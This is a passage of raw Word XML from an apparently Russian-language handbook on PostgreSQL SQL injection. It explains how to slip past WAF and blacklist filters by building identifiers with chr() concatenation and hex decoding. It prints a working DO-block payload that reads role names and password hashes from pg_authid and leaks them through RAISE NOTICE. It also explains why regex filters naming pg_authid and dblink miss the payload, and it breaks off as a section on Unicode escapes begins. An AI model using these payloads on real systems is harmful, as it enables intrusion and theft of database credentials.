        <w:t xml:space="preserve">  FOR r IN EXECUTE $sql$SELECT rolname, $sql$||chr(114)||chr(111)||chr(108)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||$sql$ FROM $sql$||chr(112)||chr(103)||chr(95)||chr(97)||chr(117)||chr(116)||chr(104)||chr(105)||chr(100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9F67FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  LOOP RAISE NOTICE $$%$$, r; END LOOP;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A65AAFC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END $do$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795D3712" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Где chr-цепочки собирают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rolpassword</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — результат через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RAISE NOTICE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> уходит в error-канал клиента (см. error-based в 3.2). Здесь скомбинированы 3.9.1 (dollar-quote </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$sql$</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$do$</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$</w:t>
      </w:r>
      <w:r>
        <w:t>), 3.9.2 (chr) и 3.5 (DO как stacked-bypass).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0816B038" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6972FF6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Regex-фильтр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\b(dblink|pg_read|pg_authid|...)\w*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ищет литеральные подстроки в тексте payload-а. Числовая последовательность </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr(112)||chr(103)||chr(95)||chr(97)||chr(117)||chr(116)||chr(104)||chr(105)||chr(100)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не содержит подстроки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — regex её не находит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBDE371" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Sanitizer-blacklist в коде (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if "pg_authid" in q</w:t>
      </w:r>
      <w:r>
        <w:t>) — то же: подстроки нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECB6701" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Случай: WAF делает statistical-анализ (slang: «слишком много </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в payload»). Современные WAF (Cloudflare bot detection, Imperva ML-mode) учитывают такие метрики, но классический regex-WAF — нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3B5C12" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C47D5B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr(N)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — built-in функция, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr(integer) → text</w:t>
      </w:r>
      <w:r>
        <w:t>, возвращает один символ по Unicode codepoint. PG 9.1+ принимает любой valid Unicode codepoint, до 9.1 — только ASCII.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADD8EC9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Оператор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text || text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — конкатенация строк. Вычисляется на этапе исполнения, не парсинга.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BBAAA9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   В Payload A результат конкатенации становится текстовым значением в выражении </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE email = ...</w:t>
      </w:r>
      <w:r>
        <w:t>. Парсер PG видит конкретное выражение, не строку — никаких допущений о структуре.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8ECF9D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В Payload B результат подаётся в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — plpgsql-конструкция, динамически парсит и исполняет полученную строку как SQL. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет ровно такую же модель безопасности, как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в скриптовых языках — что подадите, то исполнится.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BF990C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   DO-блок (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $do$ ... $do$</w:t>
      </w:r>
      <w:r>
        <w:t>) — анонимная plpgsql-программа, синтаксически одна команда — см. 3.9.1 (Payload B) и 3.5 (граница «3.5 vs одна команда»).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385F2C97" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363E5E6B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 9.x – 17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (все поддерживаемые). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — built-in, стабилен с 8.0. Unicode-расширение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — с 9.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B9063E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> работает везде идентично self-hosted. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступна PUBLIC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02312410" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32411B62" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — dollar-quoting, часто комбинируется с 3.9.2 для устранения внутренних </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-escapes (как в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RAISE NOTICE $$%$$, ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в Payload B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C44078" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>convert_from(decode('70675f617574686964', 'hex'), 'UTF8')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — компактная альтернатива chr-цепочкам для длинных строк (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через decode — одна шестнадцатеричная строка вместо девяти </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вызовов).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E9F91C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — DO-блок как обход extended-protocol-stacking ограничения. Payload B полностью полагается на этот механизм.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780685E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6.1, 3.6.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — основные потребители 3.9.2 (имена </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_connect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_exec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres_fdw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE SERVER</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4AF95B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — chr-payload для построения имени </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после получения SUPERUSER через 3.13.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304CF233" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Identifier injection в plpgsql. Внутренний </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в Payload B — это пример того же самого механизма, только инициированного атакующим.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F455B6"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\bchr\s*\(\s*\d+\s*\)\s*\|\|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (chr-цепочка из ≥3 звеньев) нет.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4288F006" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6CE5E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: String Functions and Operators — chr()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBCB2F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: PL/pgSQL — EXECUTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0829DA90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: DO statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B28853" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PortSwigger Web Security Academy: SQL injection cheat sheet — character encoding bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0424B2F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>HackTricks: PostgreSQL Injection — chr / ASCII bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF28D44" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>OWASP: SQL Injection Bypassing WAF — character functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2233E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.9.3 Unicode escape U&amp;'\0027' и U&amp;"identifier"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2D3832" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код — см. 3.9.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD1C0DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что блокирует фильтр.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Из WAF 3.9.0 этот приём напрямую обходит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE0AAF0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\b(dblink|pg_read|pg_authid|...)\w*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функции/каталоги по подстроке (как 3.9.2, но более компактно).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A8C10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Дополнительные классы фильтров, против которых Unicode-escape сильнее, чем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr()</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ABF13F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sanitizer, удаляющий вызовы функций:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re.sub(r'\w+\s*\(', '', q)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — удаляет </w:t>
